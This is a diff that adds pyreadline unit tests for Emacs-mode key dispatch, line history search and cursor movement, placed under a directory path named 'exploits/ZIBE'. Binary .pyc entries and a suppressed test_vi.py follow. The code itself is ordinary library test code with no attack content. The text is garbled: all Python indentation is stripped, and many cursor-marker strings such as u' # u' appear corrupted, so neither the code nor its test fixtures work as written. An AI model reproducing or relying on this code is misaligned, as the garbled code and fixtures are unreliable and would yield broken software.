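+# Copyright (C) 2006 Michael Graz. <mgraz@plan10.com>
+# Copyright (C) 2006 Michael Graz. <mgraz@plan10.com>
+#
+# Distributed under the terms of the BSD License. The full license is in
+# the file COPYING, distributed as part of this software.
+#*****************************************************************************
+
+import sys, unittest
+import pdb
+sys.path.append (u'../..')
+from pyreadline.modes.emacs import *
+from pyreadline import keysyms
+from pyreadline.lineeditor import lineobj
+
+from common import *
+from pyreadline.logger import log
+import pyreadline.logger as logger
+logger.sock_silent=True
+logger.show_event=[u"debug"]
+
+#----------------------------------------------------------------------
+
+
+class EmacsModeTest (EmacsMode):
+tested_commands={}
+def __init__ (self):
+EmacsMode.__init__ (self, MockReadline())
+self.mock_console = MockConsole ()
+self.init_editing_mode (None)
+self.lst_completions = []
+self.completer = self.mock_completer
+self.completer_delims = u' u'
+self.tabstop = 4
+self.mark_directories=False
+self.show_all_if_ambiguous=False
+
+def get_mock_console (self):
+return self.mock_console
+console = property (get_mock_console)
+
+def _set_line (self, text):
+self.l_buffer.set_line (text)
+
+def get_line (self):
+return self.l_buffer.get_line_text ()
+line = property (get_line)
+
+def get_line_cursor (self):
+return self.l_buffer.point
+line_cursor = property (get_line_cursor)
+
+def input (self, keytext):
+if keytext[0:1] == u'"' and keytext[-1:] == u'"':
+lst_key = [u'"%s"' % c for c in keytext[1:-1]]
+else:
+lst_key = [keytext]
+for key in lst_key:
+keyinfo, event = keytext_to_keyinfo_and_event (key)
+dispatch_func = self.key_dispatch.get(keyinfo.tuple(),self.self_insert)
+self.tested_commands[dispatch_func.__name__]=dispatch_func
+log(u"keydisp: %s %s"%( key,dispatch_func.__name__))
+dispatch_func (event)
+self.previous_func=dispatch_func
+
+def accept_line (self, e):
+if EmacsMode.accept_line (self, e):
+# simulate return
+# self.add_history (self.line)
+self.l_buffer.reset_line ()
+
+def mock_completer (self, text, state):
+return self.lst_completions [state]
+
+#----------------------------------------------------------------------
+
+class TestsKeyinfo (unittest.TestCase):
+
+def test_keyinfo (self):
+keyinfo, event = keytext_to_keyinfo_and_event (u'"d"')
+self.assertEqual (u'd', event.char)
+keyinfo, event = keytext_to_keyinfo_and_event (u'"D"')
+self.assertEqual (u'D', event.char)
+keyinfo, event = keytext_to_keyinfo_and_event (u'"$"')
+self.assertEqual (u'$', event.char)
+keyinfo, event = keytext_to_keyinfo_and_event (u'Escape')
+self.assertEqual (u'\x1b', event.char)
+
+
+class TestsMovement (unittest.TestCase):
+def test_cursor (self):
+r = EmacsModeTest ()
+self.assertEqual (r.line, u'')
+r.input(u'"First Second Third"')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 18)
+r.input(u'Control-a')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 0)
+r.input(u'Control-e')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 18)
+r.input(u'Home')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 0)
+r.input(u'Right')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 1)
+r.input(u'Ctrl-f')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 2)
+r.input(u'Ctrl-Right')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 5)
+r.input(u'Ctrl-Right')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 12)
+r.input(u'Ctrl-Right')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 18)
+r.input(u'Ctrl-Right')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 18)
+r.input(u'Ctrl-Left')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 13)
+r.input(u'Ctrl-Left')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 6)
+r.input(u'Ctrl-Left')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 0)
+r.input(u'Ctrl-Left')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 0)
+
+
+class TestsDelete (unittest.TestCase):
+def test_delete (self):
+r = EmacsModeTest ()
+self.assertEqual (r.line, u'')
+r.input(u'"First Second Third"')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 18)
+r.input(u'Delete')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 18)
+r.input(u'Left')
+r.input(u'Left')
+r.input(u'Delete')
+self.assertEqual (r.line, u'First Second Thid')
+self.assertEqual (r.line_cursor, 16)
+r.input(u'Delete')
+self.assertEqual (r.line, u'First Second Thi')
+self.assertEqual (r.line_cursor, 16)
+r.input(u'Backspace')
+self.assertEqual (r.line, u'First Second Th')
+self.assertEqual (r.line_cursor, 15)
+r.input(u'Home')
+r.input(u'Right')
+r.input(u'Right')
+self.assertEqual (r.line, u'First Second Th')
+self.assertEqual (r.line_cursor, 2)
+r.input(u'Backspace')
+self.assertEqual (r.line, u'Frst Second Th')
+self.assertEqual (r.line_cursor, 1)
+r.input(u'Backspace')
+self.assertEqual (r.line, u'rst Second Th')
+self.assertEqual (r.line_cursor, 0)
+r.input(u'Backspace')
+self.assertEqual (r.line, u'rst Second Th')
+self.assertEqual (r.line_cursor, 0)
+r.input(u'Escape')
+self.assertEqual (r.line, u'')
+self.assertEqual (r.line_cursor, 0)
+
+def test_delete_word (self):
+r = EmacsModeTest ()
+self.assertEqual (r.line, u'')
+r.input(u'"First Second Third"')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 18)
+r.input(u'Control-Backspace')
+self.assertEqual (r.line, u'First Second ')
+self.assertEqual (r.line_cursor, 13)
+r.input(u'Backspace')
+r.input(u'Left')
+r.input(u'Left')
+self.assertEqual (r.line, u'First Second')
+self.assertEqual (r.line_cursor, 10)
+r.input(u'Control-Backspace')
+self.assertEqual (r.line, u'First nd')
+self.assertEqual (r.line_cursor, 6)
+r.input(u'Escape')
+self.assertEqual (r.line, u'')
+self.assertEqual (r.line_cursor, 0)
+r.input(u'"First Second Third"')
+r.input(u'Home')
+r.input(u'Right')
+r.input(u'Right')
+r.input(u'Control-Delete')
+self.assertEqual (r.line, u'FiSecond Third')
+self.assertEqual (r.line_cursor, 2)
+r.input(u'Control-Delete')
+self.assertEqual (r.line, u'FiThird')
+self.assertEqual (r.line_cursor, 2)
+r.input(u'Control-Delete')
+self.assertEqual (r.line, u'Fi')
+self.assertEqual (r.line_cursor, 2)
+r.input(u'Control-Delete')
+self.assertEqual (r.line, u'Fi')
+self.assertEqual (r.line_cursor, 2)
+r.input(u'Escape')
+self.assertEqual (r.line, u'')
+self.assertEqual (r.line_cursor, 0)
+
+
+
+class TestsSelectionMovement (unittest.TestCase):
+def test_cursor (self):
+r = EmacsModeTest ()
+self.assertEqual (r.line, u'')
+r.input(u'"First Second Third"')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 18)
+self.assertEqual (r.l_buffer.selection_mark, -1)
+r.input(u'Home')
+r.input(u'Shift-Right')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 1)
+self.assertEqual (r.l_buffer.selection_mark, 0)
+r.input(u'Shift-Control-Right')
+self.assertEqual (r.line, u'First Second Third')
+self.assertEqual (r.line_cursor, 5)
+self.assertEqual (r.l_buffer.selection_mark, 0)
+r.input(u'"a"')
+self.assertEqual (r.line, u'a Second Third')
+self.assertEqual (r.line_cursor, 1)
+self.assertEqual (r.l_buffer.selection_mark, -1)
+r.input(u'Shift-End')
+self.assertEqual (r.line, u'a Second Third')
+self.assertEqual (r.line_cursor, 14)
+self.assertEqual (r.l_buffer.selection_mark, 1)
+r.input(u'Delete')
+self.assertEqual (r.line, u'a')
+self.assertEqual (r.line_cursor, 1)
+self.assertEqual (r.l_buffer.selection_mark, -1)
+
+
+
+class TestsHistory (unittest.TestCase):
+def test_history_1 (self):
+r = EmacsModeTest ()
+r.add_history (u'aa')
+r.add_history (u'bbb')
+self.assertEqual (r.line, u'')
+r.input (u'Up')
+self.assertEqual (r.line, u'bbb')
+self.assertEqual (r.line_cursor, 3)
+r.input (u'Up')
+self.assertEqual (r.line, u'aa')
+self.assertEqual (r.line_cursor, 2)
+r.input (u'Up')
+self.assertEqual (r.line, u'aa')
+self.assertEqual (r.line_cursor, 2)
+r.input (u'Down')
+self.assertEqual (r.line, u'bbb')
+self.assertEqual (r.line_cursor, 3)
+r.input (u'Down')
+self.assertEqual (r.line, u'')
+self.assertEqual (r.line_cursor, 0)
+
+def test_history_2 (self):
+r = EmacsModeTest ()
+r.add_history (u'aaaa')
+r.add_history (u'aaba')
+r.add_history (u'aaca')
+r.add_history (u'akca')
+r.add_history (u'bbb')
+r.add_history (u'ako')
+self.assert_line(r,'',0)
+r.input (u'"a"')
+r.input (u'Up')
+self.assert_line(r,'ako',1)
+r.input (u'Up')
+self.assert_line(r,'akca',1)
+r.input (u'Up')
+self.assert_line(r,'aaca',1)
+r.input (u'Up')
+self.assert_line(r,'aaba',1)
+r.input (u'Up')
+self.assert_line(r,'aaaa',1)
+r.input (u'Right')
+self.assert_line(r,'aaaa',2)
+r.input (u'Down')
+self.assert_line(r,'aaba',2)
+r.input (u'Down')
+self.assert_line(r,'aaca',2)
+r.input (u'Down')
+self.assert_line(r,'aaca',2)
+r.input (u'Left')
+r.input (u'Left')
+r.input (u'Down')
+r.input (u'Down')
+self.assert_line(r,'bbb',3)
+r.input (u'Left')
+self.assert_line(r,'bbb',2)
+r.input (u'Down')
+self.assert_line(r,'bbb',2)
+r.input (u'Up')
+self.assert_line(r,'bbb',2)
+
+
+def test_history_3 (self):
+r = EmacsModeTest ()
+r.add_history (u'aaaa')
+r.add_history (u'aaba')
+r.add_history (u'aaca')
+r.add_history (u'akca')
+r.add_history (u'bbb')
+r.add_history (u'ako')
+self.assert_line(r,'',0)
+r.input (u'')
+r.input (u'Up')
+self.assert_line(r,'ako',3)
+r.input (u'Down')
+self.assert_line(r,'',0)
+r.input (u'Up')
+self.assert_line(r,'ako',3)
+
+def test_history_3 (self):
+r = EmacsModeTest ()
+r.add_history (u'aaaa')
+r.add_history (u'aaba')
+r.add_history (u'aaca')
+r.add_history (u'akca')
+r.add_history (u'bbb')
+r.add_history (u'ako')
+self.assert_line(r,'',0)
+r.input (u'k')
+r.input (u'Up')
+self.assert_line(r,'k',1)
+
+def test_complete (self):
+import rlcompleter
+logger.sock_silent = False
+
+log("-" * 50)
+r = EmacsModeTest()
+completerobj = rlcompleter.Completer()
+def _nop(val, word):
+return word
+completerobj._callable_postfix = _nop
+r.completer = completerobj.complete
+r._bind_key("tab", r.complete)
+r.input(u'"exi(ksdjksjd)"')
+r.input(u'Control-a')
+r.input(u'Right')
+r.input(u'Right')
+r.input(u'Right')
+r.input(u'Tab')
+self.assert_line(r, u"exit(ksdjksjd)", 4)
+
+r.input(u'Escape')
+r.input(u'"exi"')
+r.input(u'Control-a')
+r.input(u'Right')
+r.input(u'Right')
+r.input(u'Right')
+r.input(u'Tab')
+self.assert_line(r, u"exit", 4)
+
+
+
+def assert_line(self,r,line,cursor):
+self.assertEqual (r.line, line)
+self.assertEqual (r.line_cursor, cursor)
+
+#----------------------------------------------------------------------
+# utility functions
+
+#----------------------------------------------------------------------
+
+if __name__ == u'__main__':
+Tester()
+tested=EmacsModeTest.tested_commands.keys()
+tested.sort()
+# print " Tested functions ".center(60,"-")
+# print "\n".join(tested)
+# print
+
+all_funcs=dict([(x.__name__,x) for x in EmacsModeTest().key_dispatch.values()])
+all_funcs=all_funcs.keys()
+not_tested=[x for x in all_funcs if x not in tested]
+not_tested.sort()
+print " Not tested functions ".center(60,"-")
+print "\n".join(not_tested)
+
+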
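--- a/windows/exploits/ZIBE/pyreadline/test/test_history.py
+++ b/windows/exploits/ZIBE/pyreadline/test/test_history.py
@@ -0,0 +1,148 @@
+# -*- coding: UTF-8 -*-
+# Copyright (C) 2007 Jörgen Stenarson. <>
+
+import sys, unittest
+sys.path.append (u'../..')
+#from pyreadline.modes.vi import *
+#from pyreadline import keysyms
+from pyreadline.lineeditor import lineobj
+from pyreadline.lineeditor.history import LineHistory
+import pyreadline.lineeditor.history as history
+
+import pyreadline.logger
+pyreadline.logger.sock_silent=False
+from pyreadline.logger import log
+#----------------------------------------------------------------------
+
+
+#----------------------------------------------------------------------
+RL=lineobj.ReadLineTextBuffer
+
+class Test_prev_next_history(unittest.TestCase):
+t = u"test text"
+
+def setUp(self):
+self.q = q = LineHistory()
+for x in [u"aaaa", u"aaba", u"aaca", u"akca", u"bbb", u"ako"]:
+q.add_history(RL(x))
+
+def test_previous_history (self):
+hist = self.q
+assert hist.history_cursor == 6
+l = RL(u"")
+hist.previous_history(l)
+assert l.get_line_text() == u"ako"
+hist.previous_history(l)
+assert l.get_line_text() == u"bbb"
+hist.previous_history(l)
+assert l.get_line_text() == u"akca"
+hist.previous_history(l)
+assert l.get_line_text() == u"aaca"
+hist.previous_history(l)
+assert l.get_line_text() == u"aaba"
+hist.previous_history(l)
+assert l.get_line_text() == u"aaaa"
+hist.previous_history(l)
+assert l.get_line_text() == u"aaaa"
+
+def test_next_history (self):
+hist=self.q
+hist.beginning_of_history()
+assert hist.history_cursor==0
+l=RL(u"")
+hist.next_history(l)
+assert l.get_line_text()==u"aaba"
+hist.next_history(l)
+assert l.get_line_text()==u"aaca"
+hist.next_history(l)
+assert l.get_line_text()==u"akca"
+hist.next_history(l)
+assert l.get_line_text()==u"bbb"
+hist.next_history(l)
+assert l.get_line_text()==u"ako"
+hist.next_history(l)
+assert l.get_line_text()==u"ako"
+
+class Test_prev_next_history(unittest.TestCase):
+t = u"test text"
+
+def setUp(self):
+self.q = q = LineHistory()
+for x in [u"aaaa",u"aaba",u"aaca",u"akca",u"bbb",u"ako"]:
+q.add_history(RL(x))
+
+def test_history_search_backward (self):
+q = LineHistory()
+for x in [u"aaaa",u"aaba",u"aaca",u" aacax",u"akca",u"bbb",u"ako"]:
+q.add_history(RL(x))
+a=RL(u"aa",point=2)
+for x in [u"aaca",u"aaba",u"aaaa",u"aaaa"]:
+res=q.history_search_backward(a)
+assert res.get_line_text()==x
+
+def test_history_search_forward (self):
+q = LineHistory()
+for x in [u"aaaa",u"aaba",u"aaca",u" aacax",u"akca",u"bbb",u"ako"]:
+q.add_history(RL(x))
+q.beginning_of_history()
+a=RL(u"aa",point=2)
+for x in [u"aaba",u"aaca",u"aaca"]:
+res=q.history_search_forward(a)
+assert res.get_line_text()==x
+
+class Test_history_search_incr_fwd_backwd(unittest.TestCase):
+def setUp(self):
+self.q = q = LineHistory()
+for x in [u"aaaa",u"aaba",u"aaca",u"akca",u"bbb",u"ako"]:
+q.add_history(RL(x))
+
+def test_backward_1(self):
+q = self.q
+self.assertEqual(q.reverse_search_history(u"b"), u"bbb")
+self.assertEqual(q.reverse_search_history(u"b"), u"aaba")
+self.assertEqual(q.reverse_search_history(u"bb"), u"aaba")
+
+def test_backward_2(self):
+q = self.q
+self.assertEqual(q.reverse_search_history(u"a"), u"ako")
+self.assertEqual(q.reverse_search_history(u"aa"), u"aaca")
+self.assertEqual(q.reverse_search_history(u"a"), u"aaca")
+self.assertEqual(q.reverse_search_history(u"ab"), u"aaba")
+
+
+def test_forward_1(self):
+q = self.q
+self.assertEqual(q.forward_search_history(u"a"), u"ako")
+
+def test_forward_2(self):
+q = self.q
+q.history_cursor = 0
+self.assertEqual(q.forward_search_history(u"a"), u"aaaa")
+self.assertEqual(q.forward_search_history(u"a"), u"aaba")
+self.assertEqual(q.forward_search_history(u"ak"), u"akca")
+self.assertEqual(q.forward_search_history(u"akl"), u"akca")
+self.assertEqual(q.forward_search_history(u"ak"), u"akca")
+self.assertEqual(q.forward_search_history(u"ako"), u"ako")
+
+class Test_empty_history_search_incr_fwd_backwd(unittest.TestCase):
+def setUp(self):
+self.q = q = LineHistory()
+
+def test_backward_1(self):
+q = self.q
+self.assertEqual(q.reverse_search_history(u"b"), u"")
+
+def test_forward_1(self):
+q = self.q
+self.assertEqual(q.forward_search_history(u"a"), u"")
+
+
+#----------------------------------------------------------------------
+# utility functions
+
+#----------------------------------------------------------------------
+
+if __name__ == u'__main__':
+unittest.main()
+
+l=lineobj.ReadLineTextBuffer(u"First Second Third")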
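--- a/windows/exploits/ZIBE/pyreadline/test/test_lineeditor.py
+++ b/windows/exploits/ZIBE/pyreadline/test/test_lineeditor.py
@@ -0,0 +1,390 @@
+# Copyright (C) 2006 Michael Graz. <mgraz@plan10.com>
+
+import sys, unittest
+sys.path.append (u'../..')
+#from pyreadline.modes.vi import *
+#from pyreadline import keysyms
+from pyreadline.lineeditor import lineobj
+
+#----------------------------------------------------------------------
+
+
+#----------------------------------------------------------------------
+
+class Test_copy (unittest.TestCase):
+def test_copy1 (self):
+l=lineobj.ReadLineTextBuffer(u"first second")
+q=l.copy()
+self.assertEqual(q.get_line_text(),l.get_line_text())
+self.assertEqual(q.point,l.point)
+self.assertEqual(q.mark,l.mark)
+
+def test_copy2 (self):
+l=lineobj.ReadLineTextBuffer(u"first second",point=5)
+q=l.copy()
+self.assertEqual(q.get_line_text(),l.get_line_text())
+self.assertEqual(q.point,l.point)
+self.assertEqual(q.mark,l.mark)
+
+
+class Test_linepos (unittest.TestCase):
+t="test text"
+def test_NextChar (self):
+t=self.t
+l=lineobj.ReadLineTextBuffer(t)
+for i in range(len(t)):
+self.assertEqual(i,l.point)
+l.point=lineobj.NextChar
+#advance past end of buffer
+l.point=lineobj.NextChar
+self.assertEqual(len(t),l.point)
+
+def test_PrevChar (self):
+t=self.t
+l=lineobj.ReadLineTextBuffer(t,point=len(t))
+for i in range(len(t)):
+self.assertEqual(len(t)-i,l.point)
+l.point=lineobj.PrevChar
+#advance past beginning of buffer
+l.point=lineobj.PrevChar
+self.assertEqual(0,l.point)
+
+def test_EndOfLine (self):
+t=self.t
+l=lineobj.ReadLineTextBuffer(t,point=len(t))
+for i in range(len(t)):
+l.point=i
+l.point=lineobj.EndOfLine
+self.assertEqual(len(t),l.point)
+
+def test_StartOfLine (self):
+t=self.t
+l=lineobj.ReadLineTextBuffer(t,point=len(t))
+for i in range(len(t)):
+l.point=i
+l.point=lineobj.StartOfLine
+self.assertEqual(0,l.point)
+
+
+class Tests_linepos2(Test_linepos):
+t="kajkj"
+
+class Tests_linepos3(Test_linepos):
+t=""
+
+
+class Test_movement (unittest.TestCase):
+def test_NextChar (self):
+cmd=lineobj.NextChar
+tests=[
+# u"First"
+(cmd,
+u"First",
+u"# u",
+u" # u"),
+(cmd,
+u"First",
+u" # u",
+u" #"),
+(cmd,
+u"First",
+u" #",
+u" #"),
+]
+for cmd,text,init_point,expected_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+l.point=cmd
+self.assertEqual(get_point_pos(expected_point),l.point)
+
+def test_PrevChar (self):
+cmd=lineobj.PrevChar
+tests=[
+# u"First"
+(cmd,
+u"First",
+u" #",
+u" # u"),
+(cmd,
+u"First",
+u" # u",
+u"# u"),
+(cmd,
+u"First",
+u"# u",
+u"# u"),
+]
+for cmd,text,init_point,expected_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+l.point=cmd
+self.assertEqual(get_point_pos(expected_point),l.point)
+
+
+
+def test_PrevWordStart (self):
+cmd=lineobj.PrevWordStart
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+u" #",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u"# u"),
+(cmd,
+u"First Second Third",
+u"# u",
+u"# u"),
+]
+for cmd,text,init_point,expected_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+l.point=cmd
+self.assertEqual(get_point_pos(expected_point),l.point)
+
+def test_NextWordStart (self):
+cmd=lineobj.NextWordStart
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+u"# u",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" #"),
+]
+for cmd,text,init_point,expected_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+l.point=cmd
+self.assertEqual(get_point_pos(expected_point),l.point)
+
+def test_NextWordEnd (self):
+cmd=lineobj.NextWordEnd
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+u"# u",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" #"),
+]
+for cmd,text,init_point,expected_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+l.point=cmd
+self.assertEqual(get_point_pos(expected_point),l.point)
+
+def test_PrevWordEnd (self):
+cmd=lineobj.PrevWordEnd
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+u" #",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u"# u"),
+(cmd,
+u"First Second Third",
+u"# u",
+u"# u"),
+]
+for cmd,text,init_point,expected_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+l.point=cmd
+self.assertEqual(get_point_pos(expected_point),l.point)
+
+def test_WordEnd_1 (self):
+cmd=lineobj.WordEnd
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+u"# u",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" #"),
+]
+for cmd,text,init_point,expected_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+l.point=cmd
+self.assertEqual(get_point_pos(expected_point),l.point)
+
+def test_WordEnd_2 (self):
+cmd=lineobj.WordEnd
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" #"),
+]
+
+for cmd,text,init_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+self.assertRaises(lineobj.NotAWordError,cmd,l)
+
+
+def test_WordStart_1 (self):
+cmd=lineobj.WordStart
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+u"# u",
+u"# u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u"# u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" # u"),
+]
+for cmd,text,init_point,expected_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+l.point=cmd
+self.assertEqual(get_point_pos(expected_point),l.point)
+
+def test_WordStart_2 (self):
+cmd=lineobj.WordStart
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" # u"),
+(cmd,
+u"First Second Third",
+u" #"),
+]
+
+for cmd,text,init_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+self.assertRaises(lineobj.NotAWordError,cmd,l)
+
+
+def test_StartOfLine (self):
+cmd=lineobj.StartOfLine
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+u"# u",
+u"# u"),
+(cmd,
+u"First Second Third",
+u" # u",
+u"# u"),
+(cmd,
+u"First Second Third",
+u" #",
+u"# u"),
+]
+for cmd,text,init_point,expected_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+l.point=cmd
+self.assertEqual(get_point_pos(expected_point),l.point)
+
+def test_EndOfLine (self):
+cmd=lineobj.EndOfLine
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+u"# u",
+u" #"),
+(cmd,
+u"First Second Third",
+u" # u",
+u" #"),
+(cmd,
+u"First Second Third",
+u" #",
+u" #"),
+]
+for cmd,text,init_point,expected_point in tests:
+l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
+l.point=cmd
+self.assertEqual(get_point_pos(expected_point),l.point)
+
+def test_Point(self):
+cmd=lineobj.Point
+tests=[
+# u"First Second Third"
+(cmd,
+u"First Second Third",
+0),
+(cmd,
+u"First Second Third",
+12),
+(cmd,
+u"First Second Third",
+18),
+]
+for cmd,text,p in tests:
+l=lineobj.ReadLineTextBuffer(text,p)
+self.assertEqual(p,cmd(l))
+
+
+#----------------------------------------------------------------------
+# utility functions
+
+def get_point_pos(pstr):
+return pstr.index(u"#")
+
+def get_mark_pos(mstr):
+try:
+return mstr.index(u"#")
+except ValueError:
+return -1
+#----------------------------------------------------------------------
+
+if __name__ == u'__main__':
+unittest.main()
+
+l=lineobj.ReadLineTextBuffer(u"First Second Third")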
2146
windows/exploits/ZIBE/pyreadline/test/test_vi.py
Normal file
2146
windows/exploits/ZIBE/pyreadline/test/test_vi.py
Normal file
File diff suppressed because it is too large
BIN
windows/exploits/ZIBE/pyreadline/unicode_helper.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/unicode_helper.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/readline.pyc
Normal file
BIN
windows/exploits/ZIBE/readline.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/shell.pyc
Normal file
BIN
windows/exploits/ZIBE/shell.pyc
Normal file
Binary file not shown.